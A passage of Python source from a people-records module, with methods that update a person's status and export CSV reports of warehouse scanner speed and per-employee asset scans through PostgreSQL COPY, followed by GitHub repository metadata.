if cursor.rowcount:
return cursor.fetchone().p
else:
raise KeyError("Sorry, no person with UUID {0}"
" and that current password found!".format(
self.person_uuid))
def update_my_status(self, pgconn, new_status):
cursor = pgconn.cursor()
cursor.execute(textwrap.dedent("""
update people
set person_status = %(person_status)s
where person_uuid = %(person_uuid)s
returning (people.*)::people as p
"""), {'person_status':new_status,
'person_uuid':self.person_uuid})
if cursor.rowcount:
return cursor.fetchone().p
else:
raise KeyError("Sorry, bad status {0}!".format(new_status))
@staticmethod
def write_scanner_speed_csv(pgconn, savedir):
out_file_path = os.path.join(savedir, "scanner-speed.csv")
qry = textwrap.dedent("""
copy (
select to_char(date_trunc('day', a.inserted), 'YYYY-MM-DD') as date,
p.display_name as scanner,
count(*) total_scans,
case when count(*) > 1
then
round(
count(*) / (extract ('epoch' from max(a.inserted) - min(a.inserted))::numeric / 60),
1)
else NULL
end as scans_per_minute,
to_char(min(a.inserted), 'HH12:MI AM') as first_scan_of_day,
to_char(max(a.inserted), 'HH12:MI AM') as last_scan_of_day
from assets a
join people p
on a.unpacked_by = p.person_uuid
where a.inserted > current_timestamp - interval '30 days'
group by 1, 2
order by 1 desc, 2
) to stdout
with csv header
""")
cursor = pgconn.cursor()
f = open(out_file_path, "w")
cursor.copy_expert(qry, f)
log.info("Saved scanner speed report to {0}.".format(out_file_path))
return out_file_path
@staticmethod
def write_employee_scan_report(pgconn, person_uuid,
starting_date, ending_date, savedir):
"""
Write a report listing every asset scanned by this person.
"""
cursor = pgconn.cursor()
qry = cursor.mogrify(textwrap.dedent("""
copy (
select p.display_name as scanned_by,
a.tlm_id as truck_manifest_id,
t.bol,
a.itemdesc,
a.asin,
a.upc,
to_char(a.inserted, 'YYYY-MM-DD') as scanned_date,
to_char(a.inserted, 'HH12:MI AM') as scanned_time,
ah.actual_disposition,
c.container_id,
a.recommended_disposition,
ah.actual_disposition,
count(*) as units
from assets a
join people p
on p.person_uuid = a.unpacked_by
join truck_level_manifests t
on a.tlm_id = t.tlm_id
join asset_history ah
on a.asset_uuid = ah.asset_uuid
and current_timestamp <@ ah.effective
left join containers c
on ah.container_uuid = c.container_uuid
where a.unpacked_by = %(person_uuid)s
and (
%(starting_date)s is null
or a.inserted >= %(starting_date)s)
and (
%(ending_date)s is null
or a.inserted <= %(ending_date)s)
group by 1, 2, 3, 4, 5, 6, a.inserted, 9, 10, 11, 12
order by a.inserted desc
) to stdout
with csv header
"""), dict(
person_uuid=person_uuid,
starting_date=starting_date,
ending_date=ending_date))
p = Person.by_person_uuid(pgconn, person_uuid)
out_file_path = os.path.join(
savedir,
p.my_scan_report_file_name)
f = open(out_file_path, "w")
cursor.copy_expert(qry, f)
log.info("Saved employee scan report for {0} ({1}-{2})".format(
person_uuid, starting_date, ending_date))
return out_file_path
@staticmethod
def write_scan_reports_for_active_employees(pgconn, savedir,
starting_date, ending_date):
cursor = pgconn.cursor()
cursor.execute(textwrap.dedent("""
select p.*::people
from people p
where person_status != 'deactivated'
"""))
for row in cursor:
Person.write_employee_scan_report(pgconn, row.p.person_uuid,
starting_date, ending_date, savedir)
log.info("Wrote scan reports for all active (not deactivated) employees")
@property
def my_scan_report_file_name(self):
return "employee-scan-report-{0}-{1}.csv".format(
urllib.quote_plus(self.display_name.lower()),
self.person_uuid)
| {
"content_hash": "af0a6a2c7b442342d09f7ba8ed4a79af",
"timestamp": "",
"source": "github",
"line_count": 386,
"max_line_length": 104,
"avg_line_length": 27.145077720207254,
"alnum_prop": 0.5300629891200611,
"repo_name": "216software/Profiles",
"id": "6b4f11a0760600d76fc887d0c786863fa702758c",
"size": "10527",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "profiles/profiles/pg/people.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "147379"
},
{
"name": "HTML",
"bytes": "385453"
},
{
"name": "JavaScript",
"bytes": "375694"
},
{
"name": "Jinja",
"bytes": "35800"
},
{
"name": "PLpgSQL",
"bytes": "669968"
},
{
"name": "Python",
"bytes": "2903090"
},
{
"name": "Shell",
"bytes": "6185"
}
],
"symlink_target": ""
} |